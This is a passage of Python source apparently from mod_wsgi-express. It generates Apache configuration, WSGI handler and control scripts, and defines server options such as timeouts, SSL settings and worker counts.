dict(url=url), file=fp) if options['proxy_mount_points']: for mount_point, url in options['proxy_mount_points']: if mount_point.endswith('/'): print(APACHE_PROXY_PASS_MOUNT_POINT_CONFIG % dict( mount_point=mount_point, url=url), file=fp) else: print(APACHE_PROXY_PASS_MOUNT_POINT_SLASH_CONFIG % dict( mount_point=mount_point, url=url), file=fp) if options['proxy_virtual_hosts']: for host, url in options['proxy_virtual_hosts']: print(APACHE_PROXY_PASS_HOST_CONFIG % dict( host=host, port=options['port'], url=url), file=fp) if options['url_aliases']: for mount_point, target in sorted(options['url_aliases'], reverse=True): path = posixpath.abspath(target) if os.path.isdir(path) or not os.path.exists(path): if target.endswith('/') and path != '/': directory = path + '/' else: directory = path print(APACHE_ALIAS_DIRECTORY_CONFIG % dict( mount_point=mount_point, directory=directory, allow_override=options['allow_override']), file=fp) else: directory = posixpath.dirname(path) filename = posixpath.basename(path) print(APACHE_ALIAS_FILENAME_CONFIG % dict( mount_point=mount_point, directory=directory, filename=filename), file=fp) if options['enable_docs']: print(APACHE_ALIAS_DOCUMENTATION % options, file=fp) if options['error_documents']: for status, document in options['error_documents']: print(APACHE_ERROR_DOCUMENT_CONFIG % dict(status=status, document=document.replace("'", "\\'")), file=fp) if options['ssl_verify_client_urls']: paths = sorted(options['ssl_verify_client_urls'], reverse=True) for path in paths: print(APACHE_VERIFY_CLIENT_CONFIG % dict(path=path), file=fp) else: print(APACHE_VERIFY_CLIENT_CONFIG % dict(path='/'), file=fp) if options['setenv_variables']: for name, value in options['setenv_variables']: print(APACHE_SETENV_CONFIG % dict(name=name, value=value), file=fp) if options['passenv_variables']: for name in options['passenv_variables']: print(APACHE_PASSENV_CONFIG % dict(name=name), file=fp) if options['handler_scripts']: print(APACHE_HANDLER_SCRIPT_CONFIG % options, file=fp) for extension, script in options['handler_scripts']: print(APACHE_HANDLER_CONFIG % dict(handler='wsgi-resource', extension=extension), file=fp) if options['with_cgi']: print(APACHE_HANDLER_CONFIG % dict(handler='cgi-script', extension='.cgi'), file=fp) if options['service_scripts']: service_log_files = {} if options['service_log_files']: service_log_files.update(options['service_log_files']) users = dict(options['service_users'] or []) groups = dict(options['service_groups'] or []) for name, script in options['service_scripts']: user = users.get(name, '${MOD_WSGI_USER}') group = groups.get(name, '${MOD_WSGI_GROUP}') if name in service_log_files: print(APACHE_SERVICE_WITH_LOG_CONFIG % dict(name=name, user=user, group=group, script=script, port=options['port'], log_directory=options['log_directory'], log_file=service_log_files[name], rotatelogs_executable=options['rotatelogs_executable'], max_log_size=options['max_log_size'], python_path=options['python_path'], working_directory=options['working_directory'], python_eggs=options['python_eggs'], lang=options['lang'], locale=options['locale'], server_metrics_flag=options['server_metrics_flag']), file=fp) else: print(APACHE_SERVICE_CONFIG % dict(name=name, user=user, group=group, script=script, python_path=options['python_path'], working_directory=options['working_directory'], python_eggs=options['python_eggs'], lang=options['lang'], locale=options['locale'], server_metrics_flag=options['server_metrics_flag']), file=fp) if options['include_files']: for filename in options['include_files']: filename = posixpath.abspath(filename) print(APACHE_INCLUDE_CONFIG % dict(filename=filename), file=fp) if options['with_newrelic_platform']: print(APACHE_TOOLS_CONFIG % options, file=fp) if options['with_newrelic_platform']: print(APACHE_METRICS_CONFIG % options, file=fp) _interval = 1.0 _times = {} _files = [] _running = False _queue = queue.Queue() _lock = threading.Lock() def _restart(path): _queue.put(True) prefix = 'monitor (pid=%d):' % os.getpid() print('%s Change detected to "%s".' % (prefix, path), file=sys.stderr) print('%s Triggering process restart.' % prefix, file=sys.stderr) os.kill(os.getpid(), signal.SIGINT) def _modified(path): try: # If path doesn't denote a file and were previously # tracking it, then it has been removed or the file type # has changed so force a restart. If not previously # tracking the file then we can ignore it as probably # pseudo reference such as when file extracted from a # collection of modules contained in a zip file. if not os.path.isfile(path): return path in _times # Check for when file last modified. mtime = os.stat(path).st_mtime if path not in _times: _times[path] = mtime # Force restart when modification time has changed, even # if time now older, as that could indicate older file # has been restored. if mtime != _times[path]: return True except Exception: # If any exception occured, likely that file has been # been removed just before stat(), so force a restart. return True return False def _monitor(): global _files while True: # Check modification times on all files in sys.modules. for module in list(sys.modules.values()): if not hasattr(module, '__file__'): continue path = getattr(module, '__file__') if not path: continue if os.path.splitext(path)[1] in ['.pyc', '.pyo', '.pyd']: path = path[:-1] if _modified(path): return _restart(path) # Check modification times on files which have # specifically been registered for monitoring. for path in _files: if _modified(path): return _restart(path) # Go to sleep for specified interval. try: return _queue.get(timeout=_interval) except queue.Empty: pass _thread = threading.Thread(target=_monitor) _thread.setDaemon(True) def _exiting(): try: _queue.put(True) except Exception: pass _thread.join() def track_changes(path): if not path in _files: _files.append(path) def start_reloader(interval=1.0): global _interval if interval < _interval: _interval = interval global _running _lock.acquire() if not _running: prefix = 'monitor (pid=%d):' % os.getpid() print('%s Starting change monitor.' % prefix, file=sys.stderr) _running = True _thread.start() atexit.register(_exiting) _lock.release() class PostMortemDebugger(object): def __init__(self, application, startup): self.application = application self.generator = None import pdb self.debugger = pdb.Pdb() if startup: self.activate_console() def activate_console(self): self.debugger.set_trace(sys._getframe().f_back) def run_post_mortem(self): self.debugger.reset() self.debugger.interaction(None, sys.exc_info()[2]) def __call__(self, environ, start_response): try: self.generator = self.application(environ, start_response) return self except Exception: self.run_post_mortem() raise def __iter__(self): try: for item in self.generator: yield item except Exception: self.run_post_mortem() raise def close(self): try: if hasattr(self.generator, 'close'): return self.generator.close() except Exception: self.run_post_mortem() raise class RequestRecorder(object): def __init__(self, application, savedir): self.application = application self.savedir = savedir self.lock = threading.Lock() self.pid = os.getpid() self.count = 0 def __call__(self, environ, start_response): with self.lock: self.count += 1 count = self.count key = "%s-%s-%s" % (int(time.time()*1000000), self.pid, count) iheaders = os.path.join(self.savedir, key + ".iheaders") iheaders_fp = open(iheaders, 'w') icontent = os.path.join(self.savedir, key + ".icontent") icontent_fp = open(icontent, 'w+b') oheaders = os.path.join(self.savedir, key + ".oheaders") oheaders_fp = open(oheaders, 'w') ocontent = os.path.join(self.savedir, key + ".ocontent") ocontent_fp = open(ocontent, 'w+b') oaexcept = os.path.join(self.savedir, key + ".oaexcept") oaexcept_fp = open(oaexcept, 'w') orexcept = os.path.join(self.savedir, key + ".orexcept") orexcept_fp = open(orexcept, 'w') ofexcept = os.path.join(self.savedir, key + ".ofexcept") ofexcept_fp = open(ofexcept, 'w') errors = environ['wsgi.errors'] pprint.pprint(environ, stream=iheaders_fp) iheaders_fp.close() input = environ['wsgi.input'] data = input.read(8192) while data: icontent_fp.write(data) data = input.read(8192) icontent_fp.flush() icontent_fp.seek(0, os.SEEK_SET) environ['wsgi.input'] = icontent_fp def _start_response(status, response_headers, *args): pprint.pprint(((status, response_headers)+args), stream=oheaders_fp) _write = start_response(status, response_headers, *args) def write(self, data): ocontent_fp.write(data) ocontent_fp.flush() return _write(data) return write try: try: result = self.application(environ, _start_response) except: traceback.print_exception(*sys.exc_info(), file=oaexcept_fp) raise try: for data in result: ocontent_fp.write(data) ocontent_fp.flush() yield data except: traceback.print_exception(*sys.exc_info(), file=orexcept_fp) raise finally: try: if hasattr(result, 'close'): result.close() except: traceback.print_exception(*sys.exc_info(), file=ofexcept_fp) raise finally: oheaders_fp.close() ocontent_fp.close() oaexcept_fp.close() orexcept_fp.close() ofexcept_fp.close() class ApplicationHandler(object): def __init__(self, entry_point, application_type='script', callable_object='application', mount_point='/', with_newrelic_agent=False, debug_mode=False, enable_debugger=False, debugger_startup=False, enable_recorder=False, recorder_directory=None): self.entry_point = entry_point self.application_type = application_type self.callable_object = callable_object self.mount_point = mount_point if application_type == 'module': __import__(entry_point) self.module = sys.modules[entry_point] self.application = getattr(self.module, callable_object) self.target = self.module.__file__ parts = os.path.splitext(self.target)[-1] if parts[-1].lower() in ('.pyc', '.pyd', '.pyd'): self.target = parts[0] + '.py' elif application_type == 'paste': from paste.deploy import loadapp self.application = loadapp('config:%s' % entry_point) self.target = entry_point elif application_type != 'static': self.module = types.ModuleType('__wsgi__') self.module.__file__ = entry_point with open(entry_point, 'r') as fp: code = compile(fp.read(), entry_point, 'exec', dont_inherit=True) exec(code, self.module.__dict__) sys.modules['__wsgi__'] = self.module self.application = getattr(self.module, callable_object) self.target = entry_point try: self.mtime = os.path.getmtime(self.target) except Exception: self.mtime = None if with_newrelic_agent: self.setup_newrelic_agent() self.debug_mode = debug_mode self.enable_debugger = enable_debugger if enable_debugger: self.setup_debugger(debugger_startup) if enable_recorder: self.setup_recorder(recorder_directory) def setup_newrelic_agent(self): import newrelic.agent config_file = os.environ.get('NEW_RELIC_CONFIG_FILE') environment = os.environ.get('NEW_RELIC_ENVIRONMENT') global_settings = newrelic.agent.global_settings() if global_settings.log_file is None: global_settings.log_file = 'stderr' newrelic.agent.initialize(config_file, environment) newrelic.agent.register_application() self.application = newrelic.agent.WSGIApplicationWrapper( self.application) def setup_debugger(self, startup): self.application = PostMortemDebugger(self.application, startup) def setup_recorder(self, savedir): self.application = RequestRecorder(self.application, savedir) def reload_required(self, environ): if self.debug_mode: return False try: mtime = os.path.getmtime(self.target) except Exception: mtime = None return mtime != self.mtime def handle_request(self, environ, start_response): # Strip out the leading component due to internal redirect in # Apache when using web application as fallback resource. mount_point = environ.get('mod_wsgi.mount_point') script_name = environ.get('SCRIPT_NAME') path_info = environ.get('PATH_INFO') if mount_point is not None: # If this is set then it means that SCRIPT_NAME was # overridden by a trusted proxy header. In this case # we want to ignore any local mount point, simply # stripping it from the path. script_name = environ['mod_wsgi.script_name'] environ['PATH_INFO'] = script_name + path_info if self.mount_point != '/': if environ['PATH_INFO'].startswith(self.mount_point): environ['PATH_INFO'] = environ['PATH_INFO'][len( self.mount_point):] else: environ['SCRIPT_NAME'] = '' environ['PATH_INFO'] = script_name + path_info if self.mount_point != '/': if environ['PATH_INFO'].startswith(self.mount_point): environ['SCRIPT_NAME'] = self.mount_point environ['PATH_INFO'] = environ['PATH_INFO'][len( self.mount_point):] return self.application(environ, start_response) def __call__(self, environ, start_response): return self.handle_request(environ, start_response) class ResourceHandler(object): def __init__(self, resources): self.resources = {} for extension, script in resources: extension_name = re.sub(r'[^\w]{1}', '_', extension) module_name = '__wsgi_resource%s__' % extension_name module = types.ModuleType(module_name) module.__file__ = script with open(script, 'r') as fp: code = compile(fp.read(), script, 'exec', dont_inherit=True) exec(code, module.__dict__) sys.modules[module_name] = module self.resources[extension] = module def resource_extension(self, resource): return os.path.splitext(resource)[-1] def reload_required(self, resource): extension = self.resource_extension(resource) function = getattr(self.resources[extension], 'reload_required', None) if function is not None: return function(environ) return False def handle_request(self, environ, start_response): resource = environ['SCRIPT_NAME'] extension = self.resource_extension(resource) module = self.resources[extension] function = getattr(module, 'handle_request', None) if function is not None: return function(environ, start_response) function = getattr(module, 'application') return function(environ, start_response) def __call__(self, environ, start_response): return self.handle_request(environ, start_response) WSGI_HANDLER_SCRIPT = """ import os import sys import atexit import time import mod_wsgi.server working_directory = r'%(working_directory)s' entry_point = r'%(entry_point)s' application_type = '%(application_type)s' callable_object = '%(callable_object)s' mount_point = '%(mount_point)s' with_newrelic_agent = %(with_newrelic_agent)s newrelic_config_file = '%(newrelic_config_file)s' newrelic_environment = '%(newrelic_environment)s' disable_reloading = %(disable_reloading)s reload_on_changes = %(reload_on_changes)s debug_mode = %(debug_mode)s enable_debugger = %(enable_debugger)s debugger_startup = %(debugger_startup)s enable_coverage = %(enable_coverage)s coverage_directory = '%(coverage_directory)s' enable_profiler = %(enable_profiler)s profiler_directory = '%(profiler_directory)s' enable_recorder = %(enable_recorder)s recorder_directory = '%(recorder_directory)s' enable_gdb = %(enable_gdb)s os.environ['MOD_WSGI_EXPRESS'] = 'true' os.environ['MOD_WSGI_SERVER_NAME'] = '%(server_host)s' os.environ['MOD_WSGI_SERVER_ALIASES'] = %(server_aliases)r or '' if reload_on_changes: os.environ['MOD_WSGI_RELOADER_ENABLED'] = 'true' if debug_mode: os.environ['MOD_WSGI_DEBUG_MODE'] = 'true' # We need to fiddle sys.path as we are not using daemon mode and so # the working directory will not be added to sys.path by virtue of # 'home' option to WSGIDaemonProcess directive. We could use the # WSGIPythonPath directive, but that will cause .pth files to also # be evaluated. sys.path.insert(0, working_directory) if enable_debugger: os.environ['MOD_WSGI_DEBUGGER_ENABLED'] = 'true' def output_coverage_report(): coverage_info.stop() coverage_info.html_report(directory=coverage_directory) if enable_coverage: os.environ['MOD_WSGI_COVERAGE_ENABLED'] = 'true' from coverage import coverage coverage_info = coverage() coverage_info.start() atexit.register(output_coverage_report) def output_profiler_data(): profiler_info.disable() output_file = '%%s-%%d.pstats' %% (int(time.time()*1000000), os.getpid()) output_file = os.path.join(profiler_directory, output_file) profiler_info.dump_stats(output_file) if enable_profiler: os.environ['MOD_WSGI_PROFILER_ENABLED'] = 'true' from cProfile import Profile profiler_info = Profile() profiler_info.enable() atexit.register(output_profiler_data) if enable_recorder: os.environ['MOD_WSGI_RECORDER_ENABLED'] = 'true' if enable_gdb: os.environ['MOD_WSGI_GDB_ENABLED'] = 'true' if with_newrelic_agent: if newrelic_config_file: os.environ['NEW_RELIC_CONFIG_FILE'] = newrelic_config_file if newrelic_environment: os.environ['NEW_RELIC_ENVIRONMENT'] = newrelic_environment handler = mod_wsgi.server.ApplicationHandler(entry_point, application_type=application_type, callable_object=callable_object, mount_point=mount_point, with_newrelic_agent=with_newrelic_agent, debug_mode=debug_mode, enable_debugger=enable_debugger, debugger_startup=debugger_startup, enable_recorder=enable_recorder, recorder_directory=recorder_directory) if not disable_reloading: reload_required = handler.reload_required handle_request = handler.handle_request if not disable_reloading and reload_on_changes and not debug_mode: mod_wsgi.server.start_reloader() """ WSGI_RESOURCE_SCRIPT = """ import mod_wsgi.server resources = %(resources)s handler = mod_wsgi.server.ResourceHandler(resources) reload_required = handler.reload_required handle_request = handler.handle_request """ WSGI_DEFAULT_SCRIPT = """ CONTENT = b''' <html> <head> <title>My web site runs on Malt Whiskey</title> </head> <body style="margin-top: 100px;"> <table align="center"; style="width: 850px;" border="0" cellpadding="30"> <tbody> <tr> <td> <img style="width: 275px; height: 445px;" src="/__wsgi__/images/snake-whiskey.jpg"> </td> <td style="text-align: center;"> <span style="font-family: Arial,Helvetica,sans-serif; font-weight: bold; font-size: 70px;"> My web site<br>runs on<br>Malt Whiskey<br> <br> </span> <span style="font-family: Arial,Helvetica,sans-serif; font-weight: bold;"> For further information on configuring mod_wsgi,<br> see the <a href="%(documentation_url)s">documentation</a>. </span> </td> </tr> </tbody> </table> </body> </html> ''' def application(environ, start_response): status = '200 OK' output = CONTENT response_headers = [('Content-type', 'text/html'), ('Content-Length', str(len(output)))] start_response(status, response_headers) return [output] """ def generate_wsgi_handler_script(options): path = os.path.join(options['server_root'], 'handler.wsgi') with open(path, 'w') as fp: print(WSGI_HANDLER_SCRIPT % options, file=fp) path = os.path.join(options['server_root'], 'resource.wsgi') with open(path, 'w') as fp: print(WSGI_RESOURCE_SCRIPT % dict(resources=repr( options['handler_scripts'])), file=fp) path = os.path.join(options['server_root'], 'default.wsgi') with open(path, 'w') as fp: print(WSGI_DEFAULT_SCRIPT % options, file=fp) SERVER_METRICS_SCRIPT = """ import os import logging newrelic_config_file = '%(newrelic_config_file)s' newrelic_environment = '%(newrelic_environment)s' with_newrelic_platform = %(with_newrelic_platform)s if with_newrelic_platform: if newrelic_config_file: os.environ['NEW_RELIC_CONFIG_FILE'] = newrelic_config_file if newrelic_environment: os.environ['NEW_RELIC_ENVIRONMENT'] = newrelic_environment logging.basicConfig(level=logging.INFO, format='%%(name)s (pid=%%(process)d, level=%%(levelname)s): %%(message)s') _logger = logging.getLogger(__name__) try: from mod_wsgi.metrics.newrelic import Agent agent = Agent() agent.start() except ImportError: _logger.fatal('The module mod_wsgi.metrics.newrelic is not available. ' 'The New Relic platform plugin has been disabled. Install the ' '"mod_wsgi-metrics" package.') """ def generate_server_metrics_script(options): path = os.path.join(options['server_root'], 'server-metrics.py') with open(path, 'w') as fp: print(SERVER_METRICS_SCRIPT % options, file=fp) WSGI_CONTROL_SCRIPT = """ #!%(shell_executable)s # %(sys_argv)s HTTPD="%(httpd_executable)s" HTTPD_ARGS="%(httpd_arguments)s" HTTPD_COMMAND="$HTTPD $HTTPD_ARGS" MOD_WSGI_MODULES_DIRECTORY="%(modules_directory)s" export MOD_WSGI_MODULES_DIRECTORY SHLIBPATH="%(shlibpath)s" if [ "x$SHLIBPATH" != "x" ]; then %(shlibpath_var)s="$SHLIBPATH:$%(shlibpath_var)s" export %(shlibpath_var)s fi MOD_WSGI_SERVER_ROOT="%(server_root)s" export MOD_WSGI_SERVER_ROOT MOD_WSGI_LISTENER_HOST="%(host)s" export MOD_WSGI_LISTENER_HOST MOD_WSGI_HTTP_PORT="%(port)s" MOD_WSGI_HTTPS_PORT="%(https_port)s" export MOD_WSGI_HTTP_PORT export MOD_WSGI_HTTPS_PORT WSGI_RUN_USER="${WSGI_RUN_USER:-%(user)s}" WSGI_RUN_GROUP="${WSGI_RUN_GROUP:-%(group)s}" MOD_WSGI_USER="${MOD_WSGI_USER:-${WSGI_RUN_USER}}" MOD_WSGI_GROUP="${MOD_WSGI_GROUP:-${WSGI_RUN_GROUP}}" export MOD_WSGI_USER export MOD_WSGI_GROUP if [ `id -u` = "0" -a ${MOD_WSGI_USER} = "root" ]; then cat << EOF WARNING: When running as the 'root' user, it is required that the options '--user' and '--group' be specified to mod_wsgi-express. These should define a non 'root' user and group under which the Apache child worker processes and mod_wsgi daemon processes should be run. Failure to specify these options will result in Apache and/or the mod_wsgi daemon processes failing to start. See the mod_wsgi-express documentation for further information on this restriction. EOF fi MOD_WSGI_WORKING_DIRECTORY="%(working_directory)s" export MOD_WSGI_WORKING_DIRECTORY LANG='%(lang)s' LC_ALL='%(locale)s' export LANG export LC_ALL ACMD="$1" ARGV="$@" if test -f %(server_root)s/envvars; then . %(server_root)s/envvars fi STATUSURL="http://%(host)s:%(port)s/server-status" if [ "x$ARGV" = "x" ]; then ARGV="-h" fi GDB="%(gdb_executable)s" ENABLE_GDB="%(enable_gdb)s" PROCESS_NAME="%(process_name)s" cd $MOD_WSGI_WORKING_DIRECTORY case $ACMD in start|stop|restart|graceful|graceful-stop) if [ "x$ENABLE_GDB" != "xTrue" ]; then exec -a "$PROCESS_NAME" $HTTPD_COMMAND -k $ARGV else echo "run $HTTPD_ARGS -k $ARGV" > %(server_root)s/gdb.cmds gdb -x %(server_root)s/gdb.cmds $HTTPD fi ;; configtest) exec $HTTPD_COMMAND -t ;; status) exec %(python_executable)s -m webbrowser -t $STATUSURL ;; *) exec $HTTPD_COMMAND $ARGV esac """ APACHE_ENVVARS_FILE = """ . %(envvars_script)s """ def generate_control_scripts(options): path = os.path.join(options['server_root'], 'apachectl') with open(path, 'w') as fp: print(WSGI_CONTROL_SCRIPT.lstrip() % options, file=fp) os.chmod(path, 0o755) path = os.path.join(options['server_root'], 'envvars') if options['envvars_script']: with open(path, 'w') as fp: if options['envvars_script']: print(APACHE_ENVVARS_FILE.lstrip() % options, file=fp) elif not os.path.isfile(path): with open(path, 'w') as fp: pass def check_percentage(option, opt_str, value, parser): if value is not None and value < 0 or value > 1: raise optparse.OptionValueError('%s option value needs to be within ' 'the range 0 to 1.' % opt_str) setattr(parser.values, option.dest, value) option_list = [] def add_option(platforms, *args, **kwargs): targets = platforms.split('|') suppress = False if os.name == 'nt': if 'all' not in targets and 'windows' not in targets: suppress = True else: if 'all' not in targets and 'unix' not in targets: suppress = True if suppress: kwargs['help'] = optparse.SUPPRESS_HELP if 'hidden' in targets: kwargs['help'] = optparse.SUPPRESS_HELP option_list.append(optparse.make_option(*args, **kwargs)) add_option('all', '--application-type', default='script', metavar='TYPE', help='The type of WSGI application entry point ' 'that was provided. Defaults to \'script\', indicating the ' 'traditional mod_wsgi style WSGI script file specified by a ' 'filesystem path. Alternatively one can supply \'module\', ' 'indicating that the provided entry point is a Python module ' 'which should be imported using the standard Python import ' 'mechanism, or \'paste\' indicating that the provided entry ' 'point is a Paste deployment configuration file. If you want ' 'to just use the server to host static files only, then you ' 'can also instead supply \'static\' with the target being ' 'the directory containing the files to server or the current ' 'directory if none is supplied.') add_option('all', '--entry-point', default=None, metavar='FILE-PATH|MODULE', help='The file system path or ' 'module name identifying the file which contains the WSGI ' 'application entry point. How the value given is interpreted ' 'depends on the corresponding type identified using the ' '\'--application-type\' option. Use of this option is the ' 'same as if the value had been given as argument but without ' 'any option specifier. A named option is also provided so ' 'as to make it clearer in a long option list what the entry ' 'point actually is. If both methods are used, that specified ' 'by this option will take precedence.') add_option('all', '--host', default=None, metavar='IP-ADDRESS', help='The specific host (IP address) interface on which ' 'requests are to be accepted. Defaults to listening on ' 'all host interfaces.') add_option('all', '--port', default=8000, type='int', metavar='NUMBER', help='The specific port to bind to and ' 'on which requests are to be accepted. Defaults to port 8000.') add_option('all', '--http2', action='store_true', default=False, help='Flag indicating whether HTTP/2 should be enabled.' 'Requires the mod_http2 module to be available.') add_option('all', '--https-port', type='int', metavar='NUMBER', help='The specific port to bind to and on which secure ' 'requests are to be accepted.') add_option('all', '--ssl-port', type='int', metavar='NUMBER', dest='https_port', help=optparse.SUPPRESS_HELP) add_option('all', '--ssl-certificate-file', default=None, metavar='FILE-PATH', help='Specify the path to the SSL ' 'certificate file.') add_option('all', '--ssl-certificate-key-file', default=None, metavar='FILE-PATH', help='Specify the path to the private ' 'key file corresponding to the SSL certificate file.') add_option('all', '--ssl-certificate', default=None, metavar='FILE-PATH', help='Specify the common path to the SSL ' 'certificate files. This is a convenience function so that ' 'only one option is required to specify the location of the ' 'certificate file and the private key file. It is expected that ' 'the files have \'.crt\' and \'.key\' extensions. This option ' 'should refer to the common part of the names for both files ' 'which appears before the extension.') add_option('all', '--ssl-ca-certificate-file', default=None, metavar='FILE-PATH', help='Specify the path to the file with ' 'the CA certificates to be used for client authentication. When ' 'specified, access to the whole site will by default require ' 'client authentication. To require client authentication for ' 'only parts of the site, use the --ssl-verify-client option.') add_option('all', '--ssl-verify-client', action='append', metavar='URL-PATH', dest='ssl_verify_client_urls', help='Specify a sub URL of the site for which client ' 'authentication is required. When this option is specified, ' 'the default of client authentication being required for the ' 'whole site will be disabled and verification will only be ' 'required for the specified sub URL.') add_option('all', '--ssl-certificate-chain-file', default=None, metavar='FILE-PATH', help='Specify the path to a file ' 'containing the certificates of Certification Authorities (CA) ' 'which form the certificate chain of the server certificate.') add_option('all', '--ssl-environment', action='store_true', default=False, help='Flag indicating whether the standard set ' 'of SSL related variables are passed in the per request ' 'environment passed to a handler.') add_option('all', '--https-only', action='store_true', default=False, help='Flag indicating whether any requests ' 'made using a HTTP request over the non secure connection ' 'should be redirected automatically to use a HTTPS request ' 'over the secure connection.') add_option('all', '--hsts-policy', default=None, metavar='PARAMS', help='Specify the HSTS policy that should be applied when ' 'HTTPS only connections are being enforced.') add_option('all', '--server-name', default=None, metavar='HOSTNAME', help='The primary host name of the web server. If this name ' 'starts with \'www.\' then an automatic redirection from the ' 'parent domain name to the \'www.\' server name will created.') add_option('all', '--server-alias', action='append', dest='server_aliases', metavar='HOSTNAME', help='A secondary ' 'host name for the web server. May include wildcard patterns.') add_option('all', '--allow-localhost', action='store_true', default=False, help='Flag indicating whether access via ' 'localhost should still be allowed when a server name has been ' 'specified and a name based virtual host has been configured.') add_option('unix', '--processes', type='int', metavar='NUMBER', help='The number of worker processes (instances of the WSGI ' 'application) to be started up and which will handle requests ' 'concurrently. Defaults to a single process.') add_option('all', '--threads', type='int', default=5, metavar='NUMBER', help='The number of threads in the request thread pool of ' 'each process for handling requests. Defaults to 5 in each ' 'process. Note that if embedded mode and only prefork MPM ' 'is available, then processes will instead be used.') add_option('unix', '--max-clients', type='int', default=None, metavar='NUMBER', help='The maximum number of simultaneous ' 'client connections that will be accepted. This will default ' 'to being 1.5 times the total number of threads in the ' 'request thread pools across all process handling requests. ' 'Note that if embedded mode is used this will be ignored.') add_option('unix', '--initial-workers', type='float', default=None, metavar='NUMBER', action='callback', callback=check_percentage, help='The initial number of workers to create on startup ' 'expressed as a percentage of the maximum number of clients. ' 'The value provided should be between 0 and 1. The default is ' 'dependent on the type of MPM being used. Note that if ' 'embedded mode is used, this will be ignored.'), add_option('unix', '--minimum-spare-workers', type='float', default=None, metavar='NUMBER', action='callback', callback=check_percentage, help='The minimum number of spare ' 'workers to maintain expressed as a percentage of the maximum ' 'number of clients. The value provided should be between 0 and ' '1. The default is dependent on the type of MPM being used. ' 'Note that if embedded mode is used, this will be ignored.') add_option('unix', '--maximum-spare-workers', type='float', default=None, metavar='NUMBER', action='callback', callback=check_percentage, help='The maximum number of spare ' 'workers to maintain expressed as a percentage of the maximum ' 'number of clients. The value provided should be between 0 and ' '1. The default is dependent on the type of MPM being used. ' 'Note that if embedded mode is used, this will be ignored.') add_option('all', '--limit-request-body', type='int', default=10485760, metavar='NUMBER', help='The maximum number of bytes which are ' 'allowed in a request body. Defaults to 10485760 (10MB).') add_option('all', '--maximum-requests', type='int', default=0, metavar='NUMBER', help='The number of requests after which ' 'any one worker process will be restarted and the WSGI ' 'application reloaded. Defaults to 0, indicating that the ' 'worker process should never be restarted based on the number ' 'of requests received.') add_option('unix', '--startup-timeout', type='int', default=15, metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass waiting for the application to be successfully ' 'loaded and started by a worker process. When this timeout ' 'has been reached without the application having been ' 'successfully loaded and started, the worker process will ' 'be forced to restart. Defaults to 15 seconds.') add_option('unix', '--shutdown-timeout', type='int', default=5, metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass when waiting for a worker process to shutdown as a ' 'result of the maximum number of requests or inactivity timeout ' 'being reached, or when a user initiated SIGINT signal is sent ' 'to a worker process. When this timeout has been reached the ' 'worker process will be forced to exit even if there are ' 'still active requests or it is still running Python exit ' 'functions. Defaults to 5 seconds.') add_option('unix', '--restart-interval', type='int', default='0', metavar='SECONDS', help='Number of seconds between worker ' 'process restarts. If graceful timeout is also specified, ' 'active requests will be given a chance to complete before ' 'the process is forced to exit and restart. Not enabled by ' 'default.') add_option('unix', '--cpu-time-limit', type='int', default='0', metavar='SECONDS', help='Number of seconds of CPU time the ' 'process can use before it will be restarted. If graceful ' 'timeout is also specified, active requests will be given ' 'a chance to complete before the process is forced to exit ' 'and restart. Not enabled by default.') add_option('unix', '--graceful-timeout', type='int', default=15, metavar='SECONDS', help='Grace period for requests to complete ' 'normally, while still accepting new requests, when worker ' 'processes are being shutdown and restarted due to maximum ' 'requests being reached or restart interval having expired. ' 'Defaults to 15 seconds.') add_option('unix', '--eviction-timeout', type='int', default=0, metavar='SECONDS', help='Grace period for requests to complete ' 'normally, while still accepting new requests, when the WSGI ' 'application is being evicted from the worker processes, and ' 'the process restarted, due to forced graceful restart signal. ' 'Defaults to timeout specified by \'--graceful-timeout\' ' 'option.') add_option('unix', '--deadlock-timeout', type='int', default=60, metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass before the worker process is forcibly shutdown and ' 'restarted after a potential deadlock on the Python GIL has ' 'been detected. Defaults to 60 seconds.') add_option('unix', '--inactivity-timeout', type='int', default=0, metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass before the worker process is shutdown and restarted ' 'when the worker process has entered an idle state and is no ' 'longer receiving new requests. Not enabled by default.') add_option('unix', '--ignore-activity', action='append', dest='ignore_activity', metavar='URL-PATH', help='Specify ' 'the URL path for any location where activity should be ' 'ignored when the \'--activity-timeout\' option is used. ' 'This would be used on health check URLs so that health ' 'checks do not prevent process restarts due to inactivity.') add_option('unix', '--request-timeout', type='int', default=60, metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass before the worker process is forcibly shutdown and ' 'restarted when a request does not complete in the expected ' 'time. In a multi threaded worker, the request time is ' 'calculated as an average across all request threads. Defaults ' 'to 60 seconds.') add_option('unix', '--connect-timeout', type='int', default=15, metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass before giving up on attempting to get a connection ' 'to the worker process from the Apache child process which ' 'accepted the request. This comes into play when the worker ' 'listener backlog limit is exceeded. Defaults to 15 seconds.') add_option('all', '--socket-timeout', type='int', default=60, metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass before timing out on a read or write operation on ' 'a socket and aborting the request. Defaults to 60 seconds.') add_option('all', '--queue-timeout', type='int', default=45, metavar='SECONDS', help='Maximum number of seconds allowed ' 'for a request to be accepted by a worker process to be ' 'handled, taken from the time when the Apache child process ' 'originally accepted the request. Defaults to 45 seconds.') add_option('all', '--header-timeout', type='int', default=15, metavar='SECONDS', help='The number of seconds allowed for ' 'receiving the request including the headers. This may be ' 'dynamically increased if a minimum rate for reading the ' 'request and headers is also specified, up to any limit ' 'imposed by a maximum header timeout. Defaults to 15 seconds.') add_option('all', '--header-max-timeout', type='int', default=30, metavar='SECONDS', help='Maximum number of seconds allowed for ' 'receiving the request including the headers. This is the hard ' 'limit after taking into consideration and increases to the ' 'basic timeout due to minimum rate for reading the request and ' 'headers which may be specified. Defaults to 30 seconds.') add_option('all', '--header-min-rate', type='int', default=500, metavar='BYTES', help='The number of bytes required to be sent ' 'as part of the request and headers to trigger a dynamic ' 'increase in the timeout on receiving the request including ' 'headers. Each time this number of bytes is received the timeout ' 'will be increased by 1 second up to any maximum specified by ' 'the maximum header timeout. Defaults to 500 bytes.') add_option('all', '--body-timeout', type='int', default=15, metavar='SECONDS', help='The number of seconds allowed for ' 'receiving the request body. This may be dynamically increased ' 'if a minimum rate for reading the request body is also ' 'specified, up to any limit imposed by a maximum body timeout. ' 'Defaults to 15 seconds.') add_option('all', '--body-max-timeout', type='int', default=0, metavar='SECONDS', help='Maximum number of seconds allowed for ' 'receiving the request body. This is the hard limit after ' 'taking into consideration and increases to the basic timeout ' 'due to 